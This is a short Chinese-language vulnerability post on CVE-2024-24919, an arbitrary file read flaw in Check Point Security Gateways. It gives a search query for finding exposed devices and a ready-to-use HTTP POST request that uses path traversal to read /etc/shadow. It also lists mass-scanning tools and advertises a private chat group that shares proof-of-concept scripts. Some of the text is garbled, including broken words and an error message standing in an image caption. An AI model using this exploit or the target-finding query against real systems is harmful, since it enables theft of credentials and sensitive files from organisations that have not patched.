0x01 产品简介
Check Point Security Gateways 是 Check Point Sofware 提供的一系列 网络安全Q解决方案。这些解决方案包括下一代防火墙(NGFW)、数据中心安全网关和 A1驱动的量子网关,旨在为企业提供针对复杂网络威胁的先进防护。它们通过集成的威胁防护、统的安全管理和策略控制,确保网络、云、移动和端点的安全。
0x02 漏洞概述
Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用,远程攻击者可以通过构造恶意请求读取服务器上的任意文件,造成敏感信息的泄漏。目前,此漏洞已检测到在野利用。鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
0x03 搜索语法
app="Check_Point-SSL-Network-Extender"
0x04 漏洞复现
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
aCSHELL/../../../../../../../etc/shadow
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
请使用VX扫一扫加入内部POC脚本分享圈子
![OSError: [Errno 117] Structure needs cleaning](https://img-blog.csdnimg.cn/direct/43fc8113c80a4283a7c207426b6f3ad4.png)
